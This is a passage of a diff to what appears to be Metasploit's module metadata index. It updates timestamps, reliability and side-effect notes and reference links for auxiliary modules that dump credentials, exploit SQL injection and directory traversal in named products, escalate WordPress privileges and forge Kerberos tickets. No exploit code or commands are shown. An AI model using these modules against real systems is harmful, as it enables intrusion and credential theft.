"path": "/modules/auxiliary/admin/http/sysaid_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/sysaid_file_download",
@@ -4975,19 +5088,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/sysaid_sql_creds": {
"name": "SysAid Help Desk Database Credentials Disclosure",
"fullname": "auxiliary/admin/http/sysaid_sql_creds",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-06-03",
"type": "auxiliary",
@@ -5020,7 +5136,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/sysaid_sql_creds.rb",
"is_install_path": true,
"ref_name": "admin/http/sysaid_sql_creds",
@@ -5028,19 +5144,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/telpho10_credential_dump": {
"name": "Telpho10 Backup Credentials Dumper",
"fullname": "auxiliary/admin/http/telpho10_credential_dump",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2016-09-02",
"type": "auxiliary",
@@ -5048,9 +5167,7 @@
"Jan Rude"
],
"description": "This module exploits a vulnerability present in all versions of Telpho10 telephone system\n appliance. This module generates a configuration backup of Telpho10,\n downloads the file and dumps the credentials for admin login,\n phpmyadmin, phpldapadmin, etc.\n This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.",
- "references": [
-
- ],
+ "references": [],
"platform": "Linux",
"arch": "",
"rport": 80,
@@ -5070,7 +5187,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/telpho10_credential_dump.rb",
"is_install_path": true,
"ref_name": "admin/http/telpho10_credential_dump",
@@ -5078,19 +5195,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/tomcat_administration": {
"name": "Tomcat Administration Tool Default Access",
"fullname": "auxiliary/admin/http/tomcat_administration",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -5120,7 +5240,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/tomcat_administration.rb",
"is_install_path": true,
"ref_name": "admin/http/tomcat_administration",
@@ -5128,19 +5248,20 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/tomcat_ghostcat": {
"name": "Apache Tomcat AJP File Read",
"fullname": "auxiliary/admin/http/tomcat_ghostcat",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2020-02-20",
"type": "auxiliary",
@@ -5152,19 +5273,15 @@
"references": [
"CVE-2020-1938",
"EDB-48143",
- "URL-https://www.chaitin.cn/en/ghostcat"
+ "URL-http://web.archive.org/web/20250114042903/https://www.chaitin.cn/en/ghostcat"
],
"platform": "",
"arch": "",
"rport": 8009,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-11-17 12:58:05 +0000",
+ "mod_time": "2025-02-28 09:35:28 +0000",
"path": "/modules/auxiliary/admin/http/tomcat_ghostcat.rb",
"is_install_path": true,
"ref_name": "admin/http/tomcat_ghostcat",
@@ -5178,25 +5295,17 @@
"Stability": [
"crash-safe"
],
- "Reliability": [
-
- ],
- "SideEffects": [
-
- ]
+ "Reliability": [],
+ "SideEffects": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/tomcat_utf8_traversal": {
"name": "Tomcat UTF-8 Directory Traversal Vulnerability",
"fullname": "auxiliary/admin/http/tomcat_utf8_traversal",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-01-09",
"type": "auxiliary",
@@ -5230,7 +5339,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb",
"is_install_path": true,
"ref_name": "admin/http/tomcat_utf8_traversal",
@@ -5238,19 +5347,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/trendmicro_dlp_traversal": {
"name": "TrendMicro Data Loss Prevention 5.5 Directory Traversal",
"fullname": "auxiliary/admin/http/trendmicro_dlp_traversal",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-01-09",
"type": "auxiliary",
@@ -5286,7 +5398,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb",
"is_install_path": true,
"ref_name": "admin/http/trendmicro_dlp_traversal",
@@ -5294,19 +5406,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/typo3_news_module_sqli": {
"name": "TYPO3 News Module SQL Injection",
"fullname": "auxiliary/admin/http/typo3_news_module_sqli",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-04-06",
"type": "auxiliary",
@@ -5338,7 +5453,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/typo3_news_module_sqli.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_news_module_sqli",
@@ -5346,19 +5461,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/typo3_sa_2009_001": {
"name": "TYPO3 sa-2009-001 Weak Encryption Key File Disclosure",
"fullname": "auxiliary/admin/http/typo3_sa_2009_001",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-01-20",
"type": "auxiliary",
@@ -5391,7 +5509,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/typo3_sa_2009_001.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_sa_2009_001",
@@ -5399,19 +5517,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/typo3_sa_2009_002": {
"name": "Typo3 sa-2009-002 File Disclosure",
"fullname": "auxiliary/admin/http/typo3_sa_2009_002",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-02-10",
"type": "auxiliary",
@@ -5445,7 +5566,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-03-23 10:19:30 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_sa_2009_002",
@@ -5453,6 +5574,13 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -5466,9 +5594,7 @@
"auxiliary_admin/http/typo3_sa_2010_020": {
"name": "TYPO3 sa-2010-020 Remote File Disclosure",
"fullname": "auxiliary/admin/http/typo3_sa_2010_020",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -5480,7 +5606,7 @@
"references": [
"CVE-2010-3714",
"URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020",
- "URL-http://gregorkopf.de/slides_berlinsides_2010.pdf"
+ "URL-http://web.archive.org/web/20180126053019/http://gregorkopf.de/slides_berlinsides_2010.pdf"
],
"platform": "",
"arch": "",
@@ -5501,7 +5627,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/typo3_sa_2010_020.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_sa_2010_020",
@@ -5509,19 +5635,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/typo3_winstaller_default_enc_keys": {
"name": "TYPO3 Winstaller Default Encryption Keys",
"fullname": "auxiliary/admin/http/typo3_winstaller_default_enc_keys",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -5551,7 +5680,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_winstaller_default_enc_keys",
@@ -5559,6 +5688,13 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -5580,9 +5716,7 @@
"auxiliary_admin/http/ulterius_file_download": {
"name": "Ulterius Server File Download Vulnerability",
"fullname": "auxiliary/admin/http/ulterius_file_download",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -5614,7 +5748,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/ulterius_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/ulterius_file_download",
@@ -5622,19 +5756,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/vbulletin_upgrade_admin": {
"name": "vBulletin Administrator Account Creation",
"fullname": "auxiliary/admin/http/vbulletin_upgrade_admin",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-10-09",
"type": "auxiliary",
@@ -5668,7 +5805,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/vbulletin_upgrade_admin",
@@ -5676,19 +5813,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/webnms_cred_disclosure": {
"name": "WebNMS Framework Server Credential Disclosure",
"fullname": "auxiliary/admin/http/webnms_cred_disclosure",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2016-07-04",
"type": "auxiliary",
@@ -5721,7 +5862,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/webnms_cred_disclosure.rb",
"is_install_path": true,
"ref_name": "admin/http/webnms_cred_disclosure",
@@ -5729,19 +5870,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/webnms_file_download": {
"name": "WebNMS Framework Server Arbitrary Text File Download",
"fullname": "auxiliary/admin/http/webnms_file_download",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2016-07-04",
"type": "auxiliary",
@@ -5773,7 +5917,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/webnms_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/webnms_file_download",
@@ -5781,19 +5925,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/whatsup_gold_sqli": {
"name": "WhatsUp Gold SQL Injection (CVE-2024-6670)",
"fullname": "auxiliary/admin/http/whatsup_gold_sqli",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2024-08-29",
"type": "auxiliary",
@@ -5827,7 +5974,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-09-26 04:01:36 +0000",
+ "mod_time": "2025-06-23 19:38:36 +0000",
"path": "/modules/auxiliary/admin/http/whatsup_gold_sqli.rb",
"is_install_path": true,
"ref_name": "admin/http/whatsup_gold_sqli",
@@ -5848,16 +5995,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/wp_automatic_plugin_privesc": {
"name": "WordPress Plugin Automatic Config Change to RCE",
"fullname": "auxiliary/admin/http/wp_automatic_plugin_privesc",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2021-09-06",
"type": "auxiliary",
@@ -5899,9 +6042,7 @@
"Stability": [
"crash-safe"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"SideEffects": [
"config-changes",
"ioc-in-logs"
@@ -5912,16 +6053,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/wp_custom_contact_forms": {
"name": "WordPress custom-contact-forms Plugin SQL Upload",
"fullname": "auxiliary/admin/http/wp_custom_contact_forms",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-08-07",
"type": "auxiliary",
@@ -5954,7 +6091,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/wp_custom_contact_forms.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_custom_contact_forms",
@@ -5962,19 +6099,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/wp_easycart_privilege_escalation": {
"name": "WordPress WP EasyCart Plugin Privilege Escalation",
"fullname": "auxiliary/admin/http/wp_easycart_privilege_escalation",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-02-25",
"type": "auxiliary",
@@ -6006,7 +6146,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_easycart_privilege_escalation",
@@ -6014,19 +6154,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/wp_gdpr_compliance_privesc": {
"name": "WordPress WP GDPR Compliance Plugin Privilege Escalation",
"fullname": "auxiliary/admin/http/wp_gdpr_compliance_privesc",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2018-11-08",
"type": "auxiliary",
@@ -6034,7 +6178,7 @@
"Mikey Veenstra (WordFence)",
"Thomas Labadie"
],
- "description": "The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set\n wordpress administration options by overwriting values within the database.\n\n The vulnerability is present in WordPress’s admin-ajax.php, which allows unauthorized\n users to trigger handlers and make configuration changes because of a failure to do\n capability checks when executing the 'save_setting' internal action.\n\n WARNING: The module sets Wordpress configuration options without reading their current\n values and restoring them later.",
+ "description": "The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set\n wordpress administration options by overwriting values within the database.\n\n The vulnerability is present in WordPress's admin-ajax.php, which allows unauthorized\n users to trigger handlers and make configuration changes because of a failure to do\n capability checks when executing the 'save_setting' internal action.\n\n WARNING: The module sets Wordpress configuration options without reading their current\n values and restoring them later.",
"references": [
"URL-https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/",
"CVE-2018-19207",
@@ -6059,7 +6203,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-06-25 11:20:47 +0000",
"path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_gdpr_compliance_privesc",
@@ -6067,28 +6211,20 @@
"post_auth": true,
"default_credential": false,
"notes": {
- "Stability": [
-
- ],
- "Reliability": [
-
- ],
+ "Stability": [],
+ "Reliability": [],
"SideEffects": [
"config-changes"
]
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/wp_google_maps_sqli": {
"name": "WordPress Google Maps Plugin SQL Injection",
"fullname": "auxiliary/admin/http/wp_google_maps_sqli",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2019-04-02",
"type": "auxiliary",
@@ -6119,7 +6255,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/wp_google_maps_sqli.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_google_maps_sqli",
@@ -6127,19 +6263,23 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/wp_masterstudy_privesc": {
"name": "Wordpress MasterStudy Admin Account Creation",
"fullname": "auxiliary/admin/http/wp_masterstudy_privesc",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2022-02-18",
"type": "auxiliary",
@@ -6187,22 +6327,16 @@
"SideEffects": [
"ioc-in-logs"
],
- "Reliability": [
-
- ]
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/wp_post_smtp_acct_takeover": {
"name": "Wordpress POST SMTP Account Takeover",
"fullname": "auxiliary/admin/http/wp_post_smtp_acct_takeover",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2024-01-10",
"type": "auxiliary",
@@ -6234,7 +6368,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-11-28 13:18:47 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_post_smtp_acct_takeover",
@@ -6248,22 +6382,16 @@
"SideEffects": [
"ioc-in-logs"
],
- "Reliability": [
-
- ]
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/wp_symposium_sql_injection": {
"name": "WordPress Symposium Plugin SQL Injection",
"fullname": "auxiliary/admin/http/wp_symposium_sql_injection",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-08-18",
"type": "auxiliary",
@@ -6295,7 +6423,7 @@
"https"
],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_symposium_sql_injection",
@@ -6303,19 +6431,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/wp_wplms_privilege_escalation": {
"name": "WordPress WPLMS Theme Privilege Escalation",
"fullname": "auxiliary/admin/http/wp_wplms_privilege_escalation",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2015-02-09",
"type": "auxiliary",
@@ -6346,7 +6477,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_wplms_privilege_escalation",
@@ -6354,19 +6485,23 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs",
+ "config-changes"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/http/zyxel_admin_password_extractor": {
"name": "ZyXEL GS1510-16 Password Extractor",
"fullname": "auxiliary/admin/http/zyxel_admin_password_extractor",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -6397,7 +6532,7 @@
"https"
],
"targets": null,
- "mod_time": "2023-02-08 14:30:08 +0000",
+ "mod_time": "2025-05-16 01:16:37 +0000",
"path": "/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/zyxel_admin_password_extractor",
@@ -6405,19 +6540,22 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-safe"
+ ],
+ "SideEffects": [
+ "ioc-in-logs"
+ ],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/kerberos/forge_ticket": {
"name": "Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging",
"fullname": "auxiliary/admin/kerberos/forge_ticket",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -6434,14 +6572,10 @@
"platform": "",
"arch": "",
"rport": 88,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-11-28 13:14:13 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/forge_ticket",
@@ -6455,9 +6589,7 @@
"SideEffects": [
"ioc-in-logs"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"AKA": [
"Ticketer",
"Klist"
@@ -6487,9 +6619,7 @@
"auxiliary_admin/kerberos/get_ticket": {
"name": "Kerberos TGT/TGS Ticket Requester",
"fullname": "auxiliary/admin/kerberos/get_ticket",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -6502,18 +6632,12 @@
"smashery"
],
"description": "This module requests TGT/TGS Kerberos tickets from the KDC",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 88,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2025-01-29 14:25:33 +0000",
"path": "/modules/auxiliary/admin/kerberos/get_ticket.rb",
@@ -6530,12 +6654,8 @@
"Stability": [
"crash-safe"
],
- "SideEffects": [
-
- ],
- "Reliability": [
-
- ]
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -6557,9 +6677,7 @@
"auxiliary_admin/kerberos/inspect_ticket": {
"name": "Kerberos Ticket Inspecting",
"fullname": "auxiliary/admin/kerberos/inspect_ticket",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -6567,20 +6685,14 @@
"Dean Welch"
],
"description": "This module outputs the contents of a ccache/kirbi file and optionally (when provided with the appropriate key)\n decrypts and displays the encrypted content too.\n Can be used for inspecting tickets that aren't working as intended in an effort to debug them.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2023-01-26 09:21:55 +0000",
+ "mod_time": "2025-05-21 08:32:40 +0000",
"path": "/modules/auxiliary/admin/kerberos/inspect_ticket.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/inspect_ticket",
@@ -6589,30 +6701,22 @@
"default_credential": false,
"notes": {
"Stability": [
-
- ],
- "SideEffects": [
-
- ],
- "Reliability": [
-
+ "crash-safe"
],
+ "SideEffects": [],
+ "Reliability": [],
"AKA": [
"klist"
]
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_admin/kerberos/keytab": {
"name": "Kerberos keytab utilities",
"fullname": "auxiliary/admin/kerberos/keytab",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -6620,18 +6724,12 @@
"alanfoster"
],
"description": "Utilities for interacting with keytab files, which can store the hashed passwords of one or\n more principals.\n\n Discovered keytab files can be used to generate Kerberos Ticket Granting Tickets, or bruteforced\n offline.\n\n Keytab files can be also useful for decrypting Kerberos traffic using Wireshark dissectors,\n including the krbtgt encrypted blobs if the AES password hash is used.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2023-06-13 09:14:06 +0000",
"path": "/modules/auxiliary/admin/kerberos/keytab.rb",
@@ -6641,15 +6739,9 @@
"post_auth": false,
"default_credential": false,
"notes": {
- "Stability": [
-
- ],
- "SideEffects": [
-
- ],
- "Reliability": [
-
- ]
+ "Stability": [],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -6671,9 +6763,7 @@
"auxiliary_admin/kerberos/ms14_068_kerberos_checksum": {
"name": "MS14-068 Microsoft Kerberos Checksum Validation Vulnerability",
"fullname": "auxiliary/admin/kerberos/ms14_068_kerberos_checksum",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-11-18",
"type": "auxiliary",
@@ -6682,27 +6772,23 @@
"Sylvain Monne",
"juan vazquez "
],
